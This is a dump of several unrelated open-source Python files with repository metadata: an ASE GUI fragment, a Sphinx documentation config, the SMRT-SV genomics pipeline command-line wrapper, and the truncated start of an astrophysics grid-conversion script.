i += self.direction
else:
i = (i + self.direction + nimages) % nimages
self.gui.set_frame(i)
self.frame_number.value = i
return True
def new_time(self, widget):
if self.id is not None:
self.play()
|
freephys/python_ase
|
ase/gui/movie.py
|
Python
|
gpl-3.0
| 3,528
|
[
"ASE"
] |
ee3bb5e260a89ffbc348fd2345ec1dd3754db25889affd77fa4ad24c56b62f1f
|
# -*- coding: utf-8 -*-
#
# AiiDA VASP Plugin documentation build configuration file, created by
# sphinx-quickstart on Wed Feb 17 11:53:17 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'AiiDA VASP Plugin'
copyright = u'2016, Mario Žic'
author = u'Mario Žic'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'0.1'
# The full version, including alpha/beta/rc tags.
release = u'0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'default'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'bizstyle'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'AiiDAVASPPlugindoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'AiiDAVASPPlugin.tex', u'AiiDA VASP Plugin Documentation',
u'Mario Žic', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'aiidavaspplugin', u'AiiDA VASP Plugin Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'AiiDAVASPPlugin', u'AiiDA VASP Plugin Documentation',
author, 'AiiDAVASPPlugin', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
|
abelcarreras/aiida_extensions
|
plugins/jobs/vasp/docs/source/conf.py
|
Python
|
mit
| 9,316
|
[
"VASP"
] |
6682d401ac0ba5eb7bf7a884d8b648660e110550c6493835f5d7accf9a95cd52
|
#!/usr/bin/env python
import argparse
import logging
import subprocess
import sys
import os
import re
# Set logging
logging.basicConfig(filename="smrtsv.log", level=logging.DEBUG)
# Set cluster parameters
CLUSTER_SETTINGS = ' -V -cwd -e ./log -o ./log {cluster.params} -w n -S /bin/bash'
CLUSTER_FLAG = ("--drmaa", CLUSTER_SETTINGS, "-w", "60")
# Setup environment for executing commands
PROCESS_ENV = os.environ.copy()
# Prepend to PROCESS_ENV["PATH"]
INSTALL_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
INSTALL_PATH = [ # List of paths relative to INSTALL_DIR to be added to the environment $PATH
"bin",
"dist/miniconda/envs/python2/bin",
"dist/miniconda/envs/python3/bin",
"dist/miniconda/bin",
"dist/celera/wgs-8.3rc2/Linux-amd64/bin/",
"dist/amos-3.1.0/bin",
"canu/Linux-amd64/bin"
]
PROCESS_ENV_PATH = ":".join([os.path.join(INSTALL_DIR, THIS_PATH) for THIS_PATH in INSTALL_PATH])
if "PATH" in PROCESS_ENV:
PROCESS_ENV["PATH"] = PROCESS_ENV_PATH + ":" + PROCESS_ENV["PATH"]
else:
PROCESS_ENV["PATH"] = PROCESS_ENV_PATH
# Prepend to PROCESS_ENV["LD_LIBRARY_PATH"]
INSTALL_LD_PATH = [
"dist/hdf5/lib"
]
PROCESS_ENV_LD_PATH = ":".join([os.path.join(INSTALL_DIR, THIS_PATH) for THIS_PATH in INSTALL_LD_PATH])
if "LD_LIBRARY_PATH" in PROCESS_ENV:
PROCESS_ENV["LD_LIBRARY_PATH"] = PROCESS_ENV_LD_PATH + ":" + PROCESS_ENV["LD_LIBRARY_PATH"]
else:
PROCESS_ENV["LD_LIBRARY_PATH"] = PROCESS_ENV_LD_PATH
os.environ["LD_LIBRARY_PATH"] = PROCESS_ENV["LD_LIBRARY_PATH"]
# Function definitions
def _get_dist_dir():
dirname, filename = os.path.split(os.path.abspath(__file__))
return dirname
# def _build_prefix(args):
# prefix = ["snakemake", "-T", "--rerun-incomplete", "--snakefile", os.path.join(os.path.dirname(_get_dist_dir()), "Snakefile"), "-j", str(args.jobs)]
# if args.dryrun:
# prefix.append("-n")
#
# if args.distribute:
# prefix.extend(CLUSTER_FLAG)
#
# return tuple(prefix)
def _run_cmd(args):
"""
Run a command with the proper environment set.
:param args: A tuple of arguments starting with the command name.
:return: Return code or -1 if the process did not complete.
"""
sys.stdout.flush()
p = subprocess.Popen(args, env=PROCESS_ENV)
p.wait()
ret_code = p.returncode
return ret_code if ret_code is not None else -1
def _run_snake_target(args, *cmd):
"""
Run a snakemake target.
:param args: Arguments processed from the command line.
:param cmd: The command to run as a tuple starting with the name of the snakemake target.
:return: Return code from snakemake.
"""
# Use the user-defined cluster config path if one is given. Otherwise, use
# an empty config that comes with the SMRT-SV distribution.
if args.cluster_config is not None:
cluster_config_path = args.cluster_config
else:
cluster_config_path = os.path.join(os.path.dirname(_get_dist_dir()), "cluster.template.json")
# Setup snakemake command
prefix = [
"snakemake",
"-T",
"--rerun-incomplete",
"--cluster-config", cluster_config_path,
"--snakefile", os.path.join(os.path.dirname(_get_dist_dir()), "Snakefile"),
"-j", str(args.jobs)
]
if args.dryrun:
prefix.append("-n")
if args.distribute:
prefix.extend(CLUSTER_FLAG)
# Append command
prefix.extend(cmd)
# Append path and ld_path
prefix.extend([
"ld_path=%s" % PROCESS_ENV["LD_LIBRARY_PATH"],
"path=%s" % PROCESS_ENV["PATH"]
])
# Report (verbose)
if args.verbose:
print("Running snakemake command: %s" % " ".join(prefix))
# Run snakemake command
return _run_cmd(prefix)
def index(args):
return _run_snake_target(
args,
"prepare_reference",
"--config",
"reference=%s" % args.reference
)
def align(args):
return _run_snake_target(
args,
"align_reads",
"--config",
"reference=%s" % args.reference,
"reads=%s" % args.reads,
"alignments=%s" % args.alignments,
"alignments_dir=%s" % args.alignments_dir,
"batches=%s" % args.batches,
"threads=%s" % args.threads,
"tmp_dir=%s" % args.tmpdir,
"alignment_parameters=\"%s\"" % args.alignment_parameters
)
def detect(args):
"""
Detect SVs from signatures in read alignments.
"""
# Find candidate regions in alignments.
sys.stdout.write("Searching for candidate regions\n")
command = (
"get_regions",
"--config",
"reference=%s" % args.reference,
"alignments=%s" % args.alignments,
"assembly_window_size=%s" % args.assembly_window_size,
"assembly_window_slide=%s" % args.assembly_window_slide,
"min_length=%s" % args.min_length,
"min_support=%s" % args.min_support,
"max_support=%s" % args.max_support,
"min_coverage=%s" % args.min_coverage,
"max_coverage=%s" % args.max_coverage,
"min_hardstop_support=%s" % args.min_hardstop_support,
"max_candidate_length=%s" % args.max_candidate_length
)
if args.exclude:
command = command + ("regions_to_exclude=%s" % args.exclude,)
if args.candidates:
command = command + ("candidates=%s" % args.candidates,)
return _run_snake_target(args, *command)
def assemble(args):
"""
Assemble candidate regions from raw reads aligned to regions.
"""
# Generate local assemblies across the genome.
sys.stdout.write("Starting local assemblies\n")
base_command = (
"collect_assembly_alignments",
"--config",
"reference=%s" % args.reference,
"alignments=%s" % args.alignments,
"reads=%s" % args.reads,
"tmp_dir=%s" % args.tmpdir,
"alignment_parameters=\"%s\"" % args.alignment_parameters,
"mapping_quality=\"%s\"" % args.mapping_quality,
"minutes_to_delay_jobs=\"%s\"" % args.minutes_to_delay_jobs,
"assembly_log=\"%s\"" % args.assembly_log
)
if args.candidates:
# For each contig/chromosome in the candidates file, submit a separate
# Snakemake command. To do so, first split regions to assemble into one
# file per contig in a temporary directory.
tmpdir = os.path.join(os.getcwd(), "regions_by_contig")
rebuild_regions_by_contig = False
if not args.dryrun and (not os.path.exists(tmpdir) or args.rebuild_regions):
rebuild_regions_by_contig = True
if rebuild_regions_by_contig:
try:
os.mkdir(tmpdir)
except OSError:
pass
previous_contig = None
with open(args.candidates, "r") as fh:
contigs = set()
for line in fh:
contig = line.strip().split()[0]
if previous_contig != contig:
if previous_contig is not None and rebuild_regions_by_contig:
contig_file.close()
previous_contig = contig
contigs.add(contig)
if rebuild_regions_by_contig:
contig_file = open(os.path.join(tmpdir, "%s.bed" % contig), "w")
if rebuild_regions_by_contig:
contig_file.write(line)
if rebuild_regions_by_contig:
contig_file.close()
# Assemble regions per contig creating a single merged BAM for each contig.
local_assembly_basename = os.path.basename(args.assembly_alignments)
local_assemblies = set()
return_code = 0
for contig in contigs:
contig_local_assemblies = os.path.join("local_assemblies", local_assembly_basename.replace(".bam", ".%s.bam" % contig))
local_assemblies.add(contig_local_assemblies)
if os.path.exists(contig_local_assemblies):
sys.stdout.write("Local assemblies already exist for %s\n" % contig)
continue
command = base_command + ("regions_to_assemble=%s" % os.path.join(tmpdir, "%s.bed" % contig),)
command = command + ("assembly_alignments=%s" % contig_local_assemblies,)
sys.stdout.write("Starting local assemblies for %s\n" % contig)
logging.debug("Assembly command: %s", " ".join(command))
return_code = _run_snake_target(args, *command)
if return_code != 0:
break
# If the last command executed successfully, try to merge all local
# assemblies per contig into a single file.
if not args.dryrun and return_code == 0:
if len(local_assemblies) > 1:
return_code = _run_cmd(["samtools", "merge", args.assembly_alignments] + list(local_assemblies))
else:
return_code = _run_cmd(["samtools", "view", "-b", "-o", args.assembly_alignments] + list(local_assemblies))
if return_code == 0:
return_code = _run_cmd(["samtools", "index", args.assembly_alignments])
# Return the last return code.
return return_code
else:
if args.assembly_alignments:
command = base_command + ("assembly_alignments=%s" % args.assembly_alignments,)
logging.debug("Assembly command: %s", " ".join(command))
return _run_cmd(command)
def call(args):
# Call SVs, indels, and inversions.
sys.stdout.write("Calling variants\n")
return_code = _run_snake_target(
args,
"call_variants",
"--config",
"reference=%s" % args.reference,
"alignments=%s" % args.alignments,
"local_assembly_alignments=%s" % args.assembly_alignments,
"variants=%s" % args.variants,
"species=\"%s\"" % args.species,
"sample=\"%s\"" % args.sample
)
if return_code != 0:
sys.stderr.write("Failed to call variants\n")
return return_code
def run(args):
# Get default jobs
if "jobs" in args:
default_jobs = args.jobs
else:
default_jobs = 1
# Get the number of jobs for each step
job_step = re.split("\\s*[,;:]\\s*", args.runjobs.strip()) # Split into array
job_step = [job_step[i] if len(job_step) > i else '' for i in range(4)] # Extend to length 4
# Convert each number of jobs to integers
for i in range(4):
if job_step[i] != '':
try:
job_step[i] = int(job_step[i])
except ValueError:
sys.stderr.write("Invalid number of jobs for step %d: Must be an integer: \"%s\"\n" % ((i + 1), job_step[i]))
return 1
else:
job_step[i] = default_jobs
# Report the number of jobs for each task
if args.verbose and args.distribute:
print("Jobs per task:")
print("\t* Align: %s" % job_step[0])
print("\t* Detect: %s" % job_step[1])
print("\t* Assemble: %s" % job_step[2])
print("\t* Call: %s" % job_step[3])
# Build reference indices
return_code = index(args)
if return_code != 0:
sys.stderr.write("Failed to index reference\n")
return return_code
# Align
args.jobs = job_step[0]
return_code = align(args)
if return_code != 0:
sys.stderr.write("Failed to align reads\n")
return return_code
# Detect SVs.
args.jobs = job_step[1]
return_code = detect(args)
if return_code != 0:
sys.stderr.write("Failed to identify candidate regions\n")
return return_code
# Run local assemblies.
args.jobs = job_step[2]
return_code = assemble(args)
if return_code != 0:
sys.stderr.write("Failed to generate local assemblies\n")
return return_code
# Call SVs, indels, and inversions.
args.jobs = job_step[3]
return_code = call(args)
if return_code != 0:
sys.stderr.write("Failed to call variants\n")
return return_code
return 0
def genotype(args):
# Genotype SVs.
sys.stdout.write("Genotyping SVs\n")
return_code = _run_snake_target(
args,
"convert_genotypes_to_vcf",
"--config",
"genotyper_config=%s" % args.genotyper_config,
"genotyped_variants=%s" % args.genotyped_variants,
"threads=%s" % args.threads
)
if return_code != 0:
sys.stderr.write("Failed to genotype SVs\n")
return return_code
# Main
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--dryrun", "-n", action="store_true", help="Print commands that will run without running them")
parser.add_argument("--distribute", action="store_true", help="Distribute analysis to Grid Engine-style cluster")
parser.add_argument("--jobs", help="number of jobs to run simultaneously", type=int, default=1)
parser.add_argument("--tmpdir", help="temporary directory to use for distributed jobs", default="/var/tmp")
parser.add_argument("--verbose", "-v", help="print extra runtime information", action="store_true")
parser.add_argument("--cluster_config", help="JSON/YAML file specifying cluster configuration parameters to pass to Snakemake's --cluster-config option")
parser.add_argument("--drmaalib", help="For jobs that are distributed, this is the location to the DRMAA library (libdrmaa.so) installed with Grid Engine. Use this to set DRMAA_LIBRARY_PATH in the environment for pipelined commands. If DRMAA_LIBRARY_PATH is already set in the environment when calling this program, this option is not required.")
subparsers = parser.add_subparsers()
# Index a reference for use by BLASR.
parser_index = subparsers.add_parser("index", help="index a reference sequence for use by BLASR")
parser_index.add_argument("reference", help="FASTA file of reference to index")
parser_index.set_defaults(func=index)
# Align PacBio reads to an indexed reference with BLASR.
parser_align = subparsers.add_parser("align", help="align PacBio reads to an indexed reference with BLASR")
parser_align.add_argument("reference", help="FASTA file of indexed reference with .ctab and .sa in the same directory")
parser_align.add_argument("reads", help="text file with one absolute path to a PacBio reads file (.bax.h5) per line")
parser_align.add_argument("--alignments", help="text file with one absolute path to a BLASR alignments file (.bam) per line", default="alignments.fofn")
parser_align.add_argument("--alignments_dir", help="absolute path of directory for BLASR alignment files", default="alignments")
parser_align.add_argument("--batches", help="number of batches to split input reads into such that there will be one BAM output file per batch", type=int, default=1)
parser_align.add_argument("--threads", help="number of threads to use for each BLASR alignment job", type=int, default=1)
parser_align.add_argument("--alignment_parameters", help="BLASR parameters to use to align raw reads", default="-bestn 2 -maxAnchorsPerPosition 100 -advanceExactMatches 10 -affineAlign -affineOpen 100 -affineExtend 0 -insertion 5 -deletion 5 -extend -maxExtendDropoff 50")
parser_align.set_defaults(func=align)
# Detect SV signatures in BLASR alignments and build sliding windows to assemble.
parser_detector = subparsers.add_parser("detect", help="detect SV signatures in BLASR-aligned reads")
parser_detector.add_argument("reference", help="FASTA file of indexed reference with .ctab and .sa in the same directory")
parser_detector.add_argument("alignments", help="text file with one absolute path to a BLASR raw reads alignments file (.bam) per line")
parser_detector.add_argument("candidates", help="BED file of candidates detected in read alignments")
parser_detector.add_argument("--exclude", help="BED file of regions to exclude from local assembly (e.g., heterochromatic sequences, etc.)")
parser_detector.add_argument("--assembly_window_size", type=int, help="size of reference window for local assemblies", default=60000)
parser_detector.add_argument("--assembly_window_slide", type=int, help="size of reference window slide for local assemblies", default=20000)
parser_detector.add_argument("--min_length", type=int, help="minimum length required for SV candidates", default=50)
parser_detector.add_argument("--min_support", type=int, help="minimum number of supporting reads required to flag a region as an SV candidate", default=5)
parser_detector.add_argument("--max_support", type=int, help="maximum number of supporting reads allowed to flag a region as an SV candidate", default=100)
parser_detector.add_argument("--min_coverage", type=int, help="minimum number of total reads required to flag a region as an SV candidate", default=5)
parser_detector.add_argument("--max_coverage", type=int, help="maximum number of total reads allowed to flag a region as an SV candidate", default=100),
parser_detector.add_argument("--min_hardstop_support", type=int, help="minimum number of reads with hardstops required to flag a region as an SV candidate", default=11)
parser_detector.add_argument("--max_candidate_length", type=int, help="maximum length allowed for an SV candidate region", default=60000)
parser_detector.set_defaults(func=detect)
# Assemble candidate regions and align assemblies back to the reference.
parser_assembler = subparsers.add_parser("assemble", help="assemble candidate regions and align assemblies back to the reference")
parser_assembler.add_argument("reference", help="FASTA file of indexed reference with .ctab and .sa in the same directory")
parser_assembler.add_argument("reads", help="text file with one absolute path to a PacBio reads file (.bax.h5) per line")
parser_assembler.add_argument("alignments", help="text file with one absolute path to a BLASR raw reads alignments file (.bam) per line")
parser_assembler.add_argument("candidates", help="BED file of regions to assemble from raw read alignments")
parser_assembler.add_argument("assembly_alignments", help="BAM file with BLASR alignments of local assemblies against the reference")
parser_assembler.add_argument("--rebuild_regions", action="store_true", help="rebuild subset of regions to assemble")
parser_assembler.add_argument("--alignment_parameters", help="BLASR parameters to use to align local assemblies", default="-affineAlign -affineOpen 8 -affineExtend 0 -bestn 1 -maxMatch 30 -sdpTupleSize 13")
parser_assembler.add_argument("--mapping_quality", type=int, help="minimum mapping quality of raw reads to use for local assembly", default=30)
parser_assembler.add_argument("--minutes_to_delay_jobs", type=int, help="maximum number of minutes to delay local assembly jobs to limit simultaneous I/O on shared storage", default=1)
parser_assembler.add_argument("--assembly_log", help="name of log file for local assemblies", default="assembly.log")
parser_assembler.set_defaults(func=assemble)
# Call SVs and indels from BLASR alignments of local assemblies.
parser_caller = subparsers.add_parser("call", help="call SVs and indels by BLASR alignments of local or whole genome assemblies")
parser_caller.add_argument("reference", help="FASTA file of indexed reference with .ctab and .sa in the same directory")
parser_caller.add_argument("alignments", help="text file with one absolute path to a BLASR raw reads alignments file (.bam) per line")
parser_caller.add_argument("assembly_alignments", help="BAM file with BLASR alignments of local assemblies against the reference")
parser_caller.add_argument("variants", help="VCF of variants called by local assembly alignments")
parser_caller.add_argument("--sample", help="Sample name to use in final variant calls", default="UnnamedSample")
parser_caller.add_argument("--species", help="Common or scientific species name to pass to RepeatMasker", default="human")
parser_caller.set_defaults(func=call)
# Run: Call SVs and indels from BLASR alignments of raw reads.
parser_runner = subparsers.add_parser("run", help="call SVs and indels by local assembly of BLASR-aligned reads")
parser_runner.add_argument("reference", help="FASTA file of indexed reference with .ctab and .sa in the same directory")
parser_runner.add_argument("reads", help="text file with one absolute path to a PacBio reads file (.bax.h5) per line")
parser_runner.add_argument("--variants", help="VCF of variants called by local assembly alignments", default="variants.vcf")
parser_runner.add_argument("--alignments", help="text file with one absolute path to a BLASR raw reads alignments file (.bam) per line", default="alignments.fofn")
parser_runner.add_argument("--alignments_dir", help="absolute path of directory for BLASR alignment files", default="alignments")
parser_runner.add_argument("--candidates", help="BED file of candidates detected in read alignments", default="candidates.bed")
parser_runner.add_argument("--assembly_alignments", help="BAM file with BLASR alignments of local assemblies against the reference", default="local_assembly_alignments.bam")
parser_runner.add_argument("--batches", help="number of batches to split input reads into such that there will be one BAM output file per batch", type=int, default=1)
parser_runner.add_argument("--threads", help="number of threads to use for each BLASR alignment job", type=int, default=1)
parser_runner.add_argument("--exclude", help="BED file of regions to exclude from local assembly (e.g., heterochromatic sequences, etc.)")
parser_runner.add_argument("--assembly_window_size", type=int, help="size of reference window for local assemblies", default=60000)
parser_runner.add_argument("--assembly_window_slide", type=int, help="size of reference window slide for local assemblies", default=30000)
parser_runner.add_argument("--min_length", type=int, help="minimum length required for SV candidates", default=50)
parser_runner.add_argument("--min_support", type=int, help="minimum number of supporting reads required to flag a region as an SV candidate", default=5)
parser_runner.add_argument("--max_support", type=int, help="maximum number of supporting reads allowed to flag a region as an SV candidate", default=100)
parser_runner.add_argument("--min_coverage", type=int, help="minimum number of total reads required to flag a region as an SV candidate", default=5)
parser_runner.add_argument("--max_coverage", type=int, help="maximum number of total reads allowed to flag a region as an SV candidate", default=100),
parser_runner.add_argument("--rebuild_regions", action="store_true", help="rebuild subset of regions to assemble")
parser_runner.add_argument("--refindex", action="store_true", help="Generate a BLASR index on the reference sequence.")
parser_runner.add_argument("--sample", help="Sample name to use in final variant calls", default="UnnamedSample")
parser_runner.add_argument("--species", help="Common or scientific species name to pass to RepeatMasker", default="human")
parser_runner.add_argument("--runjobs", help="A comma-separated list of jobs for each step: align, detect, assemble, and call (in that order). A missing number uses the value set by --jobs (or 1 if --jobs was not set).", default="")
parser_runner.add_argument("--alignment_parameters", help="BLASR parameters to use to align raw reads", default="-bestn 2 -maxAnchorsPerPosition 100 -advanceExactMatches 10 -affineAlign -affineOpen 100 -affineExtend 0 -insertion 5 -deletion 5 -extend -maxExtendDropoff 50")
parser_runner.add_argument("--mapping_quality", type=int, help="minimum mapping quality of raw reads to use for local assembly", default=30)
parser_runner.add_argument("--minutes_to_delay_jobs", type=int, help="maximum number of minutes to delay local assembly jobs to limit simultaneous I/O on shared storage", default=1)
parser_runner.add_argument("--assembly_log", help="name of log file for local assemblies", default="assembly.log")
parser_runner.add_argument("--min_hardstop_support", type=int, help="minimum number of reads with hardstops required to flag a region as an SV candidate", default=11)
parser_runner.add_argument("--max_candidate_length", type=int, help="maximum length allowed for an SV candidate region", default=60000)
parser_runner.set_defaults(func=run)
# Genotype SVs with Illumina reads.
parser_genotyper = subparsers.add_parser("genotype", help="Genotype SVs with Illumina reads")
parser_genotyper.add_argument("genotyper_config", help="JSON configuration file with SV reference paths, samples to genotype as BAMs, and their corresponding references")
parser_genotyper.add_argument("genotyped_variants", help="VCF of SMRT SV variant genotypes for the given sample-level BAMs")
parser_genotyper.add_argument("--threads", help="number of threads to use for each BWA MEM alignment job", type=int, default=1)
parser_genotyper.set_defaults(func=genotype)
args = parser.parse_args()
# Set DRMAA library path
if args.drmaalib is not None:
PROCESS_ENV["DRMAA_LIBRARY_PATH"] = args.drmaalib
elif args.distribute and "DRMAA_LIBRARY_PATH" not in PROCESS_ENV:
sys.stderr.write("WARNING: --distribute is set, but DRMAA_LIBRARY_PATH is not set in the environment or via the --drmaalib option: Searching only in Python's library path for libdrmaa.so\n")
# Report paths if verbose
if args.verbose:
# Print python version
print('Python version: {0}'.format(re.sub('\s*\n\s*', ' - ', sys.version)))
# Print environment
print("PATH:")
for PATH_ELEMENT in PROCESS_ENV["PATH"].split(":"):
print("\t* %s" % PATH_ELEMENT)
print("LD_LIBRARY_PATH:")
for PATH_ELEMENT in PROCESS_ENV["LD_LIBRARY_PATH"].split(":"):
print("\t* %s" % PATH_ELEMENT)
if "DRMAA_LIBRARY_PATH" in PROCESS_ENV:
print("DRMAA_LIBRARY_PATH: %s" % PROCESS_ENV["DRMAA_LIBRARY_PATH"])
else:
print("DRMAA_LIBRARY_PATH: <NOT_SET>\n\t* Not required unless --distribute is set")
# Print arguments
print("Arguments:")
for key in sorted(vars(args).keys()):
print('\t* %s = %s' % (key, getattr(args, key)))
# Flush output
sys.stdout.flush()
# Make a log directory for grid-engine-style error logs if commands are
# being distributed in non-dryrun mode.
if args.distribute and not args.dryrun and not os.path.isdir("log"):
os.mkdir("log")
# Run target command
return_code = args.func(args)
sys.exit(return_code)
|
EichlerLab/pacbio_variant_caller
|
bin/smrtsv.py
|
Python
|
mit
| 26,810
|
[
"BWA"
] |
e10ecbf8b40e7ac98c6dfa38270b73ad3859edbab3a4ff0c3253835eab9696ec
|
#!/usr/bin/env python
mi=16;mj=mi;mk=mi # Dimension of the coarsest grid
Lx=3e17;Ly=Lx;Lz=Lx # Length of the Domain
Critical_value=-119 # Density Criterion
Max_level=4 # Max hierachical level
import numpy as np
import array
from math import *
from tables import *
from tables.nodes import filenode
writegrid=1
# Physical parameter
T_k=10.
X_mol=1e-9
V_t=200.
nref=[2,2,2]
T_cmb=2.73
gas_to_dust=0.0
molec=""
geom='rec3d'
root="/"
# unit conversion
m_cm=1e-2
Nn_gcm=1e6*6.022e23/2.
pc_cm=1/3.08568025e18
# dimension of input data
ni=406
nj=186
# Create Cartesian Grid
dx=Lx/float(mi);dy=Ly/float(mj);dz=Lz/float(mk)
x=[];y=[];z=[]
for i in range(mi+1):
x.append(-0.5*Lx+float(i)*dx)
for j in range(mj+1):
y.append(-0.5*Ly+float(j)*dy)
for k in range(mk+1):
z.append(-0.5*Lz+float(k)*dz)
x2 = array.array('d')
y2 = array.array('d')
z2 = array.array('d')
datadir='/home/vandine/work/GridConversion/'
# Load radius
tmpfile=datadir+'z_x1ap'
f=open( tmpfile,'rb')
ra = array.array('d')
ra.read(f,ni)
tmpfile=datadir+'z_x1bp'
f=open( tmpfile,'rb')
rb = array.array('d')
rb.read(f,ni)
# Load theta
tmpfile=datadir+'z_x2ap'
f=open( tmpfile,'rb')
thetaa = array.array('d')
thetaa.read(f,nj)
tmpfile=datadir+'z_x2bp'
f=open( tmpfile,'rb')
thetab = array.array('d')
thetab.read(f,nj)
# Load density
tmpfile=datadir+'o_d__00100'
f=open( tmpfile,'rb')
density = array.array('d')
density.read(f,ni*nj)
density=np.reshape(density,(nj,ni))
# Load velocity
tmpfile=datadir+'o_v1_00100'
f=open( tmpfile,'rb')
Vr = array.array('d')
Vr.read(f,ni*nj)
Vr=np.reshape(Vr,(nj,ni))
tmpfile=datadir+'o_v2_00100'
f=open( tmpfile,'rb')
Vt = array.array('d')
Vt.read(f,ni*nj)
Vt=np.reshape(Vt,(nj,ni))
tmpfile=datadir+'o_v3_00100'
f=open( tmpfile,'rb')
Vp = array.array('d')
Vp.read(f,ni*nj)
Vp=np.reshape(Vp,(nj,ni))
f.close()
# geometry
R_in=ra[3]
R_out=ra[ni-3]
# convert R-theta to X-Z
Xb=np.zeros((nj,ni),np.float64)
